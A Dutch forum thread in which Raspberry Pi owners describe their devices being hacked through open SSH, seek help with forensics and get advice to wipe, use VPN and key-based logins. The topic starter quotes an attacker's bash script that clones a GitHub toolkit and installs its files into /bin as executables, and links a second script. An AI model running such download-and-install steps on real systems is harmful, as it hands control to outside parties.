Raspberry pi hacked

woensdag 18 januari 2017 10:38

Acties:

0 Henk 'm!

Topicstarter

OK, laat ik beginnen met de mededeling dat ik qua beveiliging niet handig bezig ben geweest, er stond het e.a. open, passwords waren nog hetzelfde, etc. etc. domdomdom, maar wel van geleerd. Die open deur gelieve niet nog meer open te trappen want ik ben me er terdege van bewust.

Waar gaat dit over: mijn RPi is gehackt. Na enig zoeken volgende script gevonden die gerunt zijn:

#!/bin/bash
cd
rm -rf VpsPack 2>/dev/null
apt-get update 
apt-get install git build-essential libssl-dev libcurl4-gnutls-dev libexpat1-dev -y > /dev/null 2>/dev/null
git clone https://github.com/RicKbrL/VpsPack.git
clear
cd VpsPack
rm README.md
for arqs in `ls`
do
rm /bin/$arqs 2>/dev/null
mv $arqs /bin
chmod +x /bin/$arqs
done
echo -e "\033[1;33mConcluido, Execute o comando \033[1;32mVpsPack\033[1;33m como root \033[0m"

Verder is ook het volgende script gerund: http://paste.ee/r/Ump8n

Duidelijk is dat een vpspack is geinstalleerd. Men heeft dus een VPS op mijn pi gerund, waarschijnlijk niet langer dan 24h. Waar wordt zoiets in de regel voor gebruikt? En kan ik dat achterhalen?

Mijn plan als volgt, wipen, alle andere PC's in de LAN door een scanner halen, verder de volgende maatregelen: geen root als gebruiker, geen SSH van buiten (behalve via VPN), extra logging aanzetten, fail2ban.

Als laatste, als er mensen zijn die hier ervaring mee hebben ben ik een en al oor!

Criticism is prejudice made plausible.

zondag 22 januari 2017 11:21

Acties:

0 Henk 'm!

DAzN

Die VpsPack is niet het grootste probleem. Dat zorgt alleen voor een aantal scripts waarmee de configuratie van de server wordt aangepast. Erger is dat script dat is uitgevoerd.

Dat script heeft ervoor gezorgd dat Squid (proxy-server) is geinstalleerd, de SSH-server configuratie is aangepast, de firewall is gereset en aangepast, een bericht is gestuurd naar een Telegram-kanaal.

Die memory-kaart van je RPi dien je te wipen en je rpi opnieuw te configureren. Ik zie - op basis van de info die je hebt verstrekt - niets dat de rest van jouw netwerk had kunnen infecteren. Maar als je rpi jouw router/dhcp-server was, zou ik goed kijken naar dns-instellingen op je clients.

Misschien dat de rpi na deze hack een slapende drone was en dat er geen verdere commands zijn gegeven. Maar zeker is dat niet. Welke services stonden open naar jouw rpi vanaf het internet?

zondag 22 januari 2017 13:06

Acties:

0 Henk 'm!

Christian_Ku

Topicstarter

Ja, daar zit dus de kern van mijn stommiteit (en mijn harde les), port 22 stond dus open. Verder deed de pi niets meer dan een NAS zijn dus dat scheelt voor wat betreft het router/DHCP verhaal want dat was niet aan de orde.

Dat zal dus ook niet meer gebeuren en alleen nog via VPN zal ik de pi benaderen. Ik heb nu niet het vermoeden dat er meer is gebeurd. Er hing ook een osmc pi aan het netwerk en daar lijken ze niet aangekomen te zijn. Wat ik niet helemaal snap is waarom je dit zou doen en dan ook het wachtwoord van mij pi aanpassen, dan heb ik dat toch meteen door?!

Criticism is prejudice made plausible.

woensdag 12 april 2017 19:10

Acties:

0 Henk 'm!

RP6conrad

Mijn raspberry pi is ook gehackt. Nonchalance van mijn kant natuurlijk, per vergissing de pi als "dmz" aangegeven in de telenet router. Op het eerste zicht is er niet veel gebeurd, de inhoud van var/www is gewist (enkele php files), maar voor de rest zie ik geen andere schade. Ook in de log files vindt ik niet direct sporen terug. De logfile van Apache geeft volgende lijst :
127.0.0.1 - - [09/Apr/2017:06:25:03 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.2.22 (Debian) (internal dummy connection)"
127.0.0.1 - - [09/Apr/2017:06:25:03 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.2.22 (Debian) (internal dummy connection)"
127.0.0.1 - - [09/Apr/2017:06:25:03 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.2.22 (Debian) (internal dummy connection)"
127.0.0.1 - - [09/Apr/2017:06:25:03 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.2.22 (Debian) (internal dummy connection)"
Log van "apt" geeft niks verdachts. Moet ik nog ergens kijken ?
Ik gebruik de pi als "lamp" server om mijn gas/el/water te loggen, dit was niet gestopt (python service).
Meer info over mijn toepassing vindt je hier : http://wiki.robotmc.be/index.php/Loggen_pi

woensdag 12 april 2017 19:18

Acties:

0 Henk 'm!

pacificocean

Christian_Ku schreef op zondag 22 januari 2017 @ 13:06:
Ja, daar zit dus de kern van mijn stommiteit (en mijn harde les), port 22 stond dus open. Verder deed de pi niets meer dan een NAS zijn dus dat scheelt voor wat betreft het router/DHCP verhaal want dat was niet aan de orde.

Dat zal dus ook niet meer gebeuren en alleen nog via VPN zal ik de pi benaderen. Ik heb nu niet het vermoeden dat er meer is gebeurd. Er hing ook een osmc pi aan het netwerk en daar lijken ze niet aangekomen te zijn. Wat ik niet helemaal snap is waarom je dit zou doen en dan ook het wachtwoord van mij pi aanpassen, dan heb ik dat toch meteen door?!

Als je toch een sterk username en password hebt maakt het toch niet uit dat poort 22 open staat?

woensdag 12 april 2017 19:19

Acties:

+1 Henk 'm!

xh3adshotx

RP6conrad schreef op woensdag 12 april 2017 @ 19:10:
Mijn raspberry pi is ook gehackt. Nonchalance van mijn kant natuurlijk, per vergissing de pi als "dmz" aangegeven in de telenet router. Op het eerste zicht is er niet veel gebeurd, de inhoud van var/www is gewist (enkele php files), maar voor de rest zie ik geen andere schade. Ook in de log files vindt ik niet direct sporen terug. De logfile van Apache geeft volgende lijst :
127.0.0.1 - - [09/Apr/2017:06:25:03 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.2.22 (Debian) (internal dummy connection)"
127.0.0.1 - - [09/Apr/2017:06:25:03 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.2.22 (Debian) (internal dummy connection)"
127.0.0.1 - - [09/Apr/2017:06:25:03 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.2.22 (Debian) (internal dummy connection)"
127.0.0.1 - - [09/Apr/2017:06:25:03 +0200] "OPTIONS * HTTP/1.0" 200 126 "-" "Apache/2.2.22 (Debian) (internal dummy connection)"
Log van "apt" geeft niks verdachts. Moet ik nog ergens kijken ?
Ik gebruik de pi als "lamp" server om mijn gas/el/water te loggen, dit was niet gestopt (python service).
Meer info over mijn toepassing vindt je hier : http://wiki.robotmc.be/index.php/Loggen_pi

Ga er maar vanuit dat je Raspberry Pi totaal gehacked is, gewoon wipen en opnieuw installeren.

pacificocean schreef op woensdag 12 april 2017 @ 19:18:
[...]

Als je toch een sterk username en password hebt maakt het toch niet uit dat poort 22 open staat?

Liever public/private key

[ Voor 8% gewijzigd door xh3adshotx op 12-04-2017 19:20 ]

donderdag 13 april 2017 15:25

Acties:

0 Henk 'm!

Christian_Ku

Topicstarter

Command log (of hoe da took mag heten) gaf bij mij vooral inzicht in welke scripts er gedraaid waren.

Criticism is prejudice made plausible.

donderdag 13 april 2017 15:38

Acties:

0 Henk 'm!

xh3adshotx

Christian_Ku schreef op donderdag 13 april 2017 @ 15:25:
Command log (of hoe da took mag heten) gaf bij mij vooral inzicht in welke scripts er gedraaid waren.

Tot iemand de logs geleegd heeft en de gebruiker denkt dat hij/zij veilig is terwijl er spam verstuurd word of DDOS aanvallen uitgevoerd worden. Iets later komen mensen op het forum zeuren dat hun verbinding afgesloten is terwijl er toch echt niets aan de hand is...

Onderwerpen